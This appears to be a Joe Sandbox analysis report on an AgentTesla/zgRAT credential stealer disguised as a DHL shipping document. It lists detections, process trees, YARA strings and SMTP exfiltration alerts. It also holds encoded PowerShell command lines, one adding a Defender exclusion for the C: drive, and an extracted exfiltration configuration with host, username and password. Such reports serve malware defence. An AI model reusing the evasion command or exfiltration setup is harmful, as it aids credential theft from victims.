Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_Shipping_Document2.exe

Overview

General Information

Sample Name:DHL_Shipping_Document2.exe
Analysis ID:830438
MD5:e2f0b0afe1d1cabe6d0fc082fadde43f
SHA1:8ab34b84b1475d03beda51c79f841ec98e97e350
SHA256:9080fc157a688b3946bb805b004da99ebf4415ba1d9b46e3dac43a6f02dd11c3
Tags:AgentTeslaDHLexe
Infos:

Detection

AgentTesla, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • DHL_Shipping_Document2.exe (PID: 5972 cmdline: C:\Users\user\Desktop\DHL_Shipping_Document2.exe MD5: E2F0B0AFE1D1CABE6D0FC082FADDE43F)
    • powershell.exe (PID: 912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 324 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA== MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5016 cmdline: powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • Lutyzivrgpnlssvvvftlfile.exe (PID: 5084 cmdline: "C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe" MD5: B1DFD2B85A645040D8C89D0FCED4340A)
    • InstallUtil.exe (PID: 1764 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe MD5: 6EE3F830099ADD53C26DF5739B44D608)
  • explorers.exe (PID: 2364 cmdline: "C:\Users\user\AppData\Local\explorers.exe" MD5: E2F0B0AFE1D1CABE6D0FC082FADDE43F)
  • KbWSe.exe (PID: 5916 cmdline: "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe" MD5: B1DFD2B85A645040D8C89D0FCED4340A)
  • explorers.exe (PID: 612 cmdline: "C:\Users\user\AppData\Local\explorers.exe" MD5: E2F0B0AFE1D1CABE6D0FC082FADDE43F)
  • KbWSe.exe (PID: 2948 cmdline: "C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe" MD5: B1DFD2B85A645040D8C89D0FCED4340A)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "smtp.thanhphoung-vn.com", "Username": "log@thanhphoung-vn.com", "Password": "smartyok4"}
SourceRuleDescriptionAuthorStrings
00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
              • 0x11c66:$s1: file:///
              • 0x11b74:$s2: {11111-22222-10009-11112}
              • 0x11bf6:$s3: {11111-22222-50001-00000}
              • 0xf8b7:$s4: get_Module
              • 0xea28:$s5: Reverse
              • 0x11779:$s6: BlockCopy
              • 0x11769:$s7: ReadByte
              • 0x11c78:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
              0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                • 0xfe66:$s1: file:///
                • 0xafe9e:$s1: file:///
                • 0xfd74:$s2: {11111-22222-10009-11112}
                • 0xafdac:$s2: {11111-22222-10009-11112}
                • 0xfdf6:$s3: {11111-22222-50001-00000}
                • 0xafe2e:$s3: {11111-22222-50001-00000}
                • 0xdab7:$s4: get_Module
                • 0xadaef:$s4: get_Module
                • 0xcc28:$s5: Reverse
                • 0xacc60:$s5: Reverse
                • 0xf979:$s6: BlockCopy
                • 0xaf9b1:$s6: BlockCopy
                • 0xf969:$s7: ReadByte
                • 0xaf9a1:$s7: ReadByte
                • 0xfe78:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                • 0xafeb0:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  Click to see the 15 entries
                  No Sigma rule has matched
                  Timestamp:192.168.2.3208.91.199.225496995872840032 03/20/23-11:34:28.478393
                  SID:2840032
                  Source Port:49699
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497045872851779 03/20/23-11:35:14.897311
                  SID:2851779
                  Source Port:49704
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497045872840032 03/20/23-11:35:14.897311
                  SID:2840032
                  Source Port:49704
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225497035872840032 03/20/23-11:35:13.114104
                  SID:2840032
                  Source Port:49703
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223496985872851779 03/20/23-11:34:24.041449
                  SID:2851779
                  Source Port:49698
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497025872851779 03/20/23-11:35:12.738289
                  SID:2851779
                  Source Port:49702
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225496995872851779 03/20/23-11:34:28.478393
                  SID:2851779
                  Source Port:49699
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225497035872030171 03/20/23-11:35:13.113999
                  SID:2030171
                  Source Port:49703
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223497055872840032 03/20/23-11:35:15.831914
                  SID:2840032
                  Source Port:49705
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223496985872840032 03/20/23-11:34:24.041449
                  SID:2840032
                  Source Port:49698
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497025872030171 03/20/23-11:35:12.738168
                  SID:2030171
                  Source Port:49702
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223497055872030171 03/20/23-11:35:15.831914
                  SID:2030171
                  Source Port:49705
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223497055872851779 03/20/23-11:35:15.831914
                  SID:2851779
                  Source Port:49705
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225496995872030171 03/20/23-11:34:28.478287
                  SID:2030171
                  Source Port:49699
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.225497035872851779 03/20/23-11:35:13.114104
                  SID:2851779
                  Source Port:49703
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497045872030171 03/20/23-11:35:14.897278
                  SID:2030171
                  Source Port:49704
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.199.223496985872030171 03/20/23-11:34:24.041330
                  SID:2030171
                  Source Port:49698
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.3208.91.198.143497025872840032 03/20/23-11:35:12.738289
                  SID:2840032
                  Source Port:49702
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: DHL_Shipping_Document2.exeReversingLabs: Detection: 38%
                  Source: DHL_Shipping_Document2.exeVirustotal: Detection: 33%Perma Link
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeAvira: detection malicious, Label: TR/Spy.Gen8
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeAvira: detection malicious, Label: TR/Spy.Gen8
                  Source: C:\Users\user\AppData\Local\explorers.exeReversingLabs: Detection: 38%
                  Source: DHL_Shipping_Document2.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\explorers.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeJoe Sandbox ML: detected
                  Source: 0.2.DHL_Shipping_Document2.exe.1991d39abb0.11.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "smtp.thanhphoung-vn.com", "Username": "log@thanhphoung-vn.com", "Password": "smartyok4"}
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49697 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.3:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49701 version: TLS 1.2
                  Source: DHL_Shipping_Document2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256 source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Doxfkywupn.pdb source: InstallUtil.exe, 00000011.00000002.556335374.00000294205D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: InstallUtil.exe, 00000011.00000002.552825754.0000029417F5C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.552825754.000002941804D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.557517142.0000029420820000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: InstallUtil.exe, 00000011.00000002.556097458.0000029420550000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794097000.00000004.00000800.00020000.00000000.sdmp

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49703 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49703 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49703 -> 208.91.199.225:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49704 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49704 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49704 -> 208.91.198.143:587
                  Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49705 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49705 -> 208.91.199.223:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49705 -> 208.91.199.223:587
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeDNS query: name: api.ipify.org
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.199242b0000.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991c263270.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.532957763.00000199242B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficTCP traffic: 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: global trafficTCP traffic: 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: global trafficTCP traffic: 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: global trafficTCP traffic: 192.168.2.3:49698 -> 208.91.199.223:587
                  Source: global trafficTCP traffic: 192.168.2.3:49699 -> 208.91.199.225:587
                  Source: global trafficTCP traffic: 192.168.2.3:49702 -> 208.91.198.143:587
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                  Source: explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D809D7D000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.545974916.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000003.396387284.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000002.548180478.0000000000899000.00000004.00000020.00020000.00000000.sdmp, KbWSe.exe, 00000013.00000003.479323373.0000000000891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794366000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000012.00000002.554655774.000001D80A047000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.540113252.00000199245B0000.00000004.08000000.00040000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C83F000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.392885416.000001990BC53000.00000004.00000800.00020000.00000000.sdmp, DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C727000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.000002979409E000.00000004.00000800.00020000.00000000.sdmp, explorers.exe, 00000016.00000002.554544853.0000029794083000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
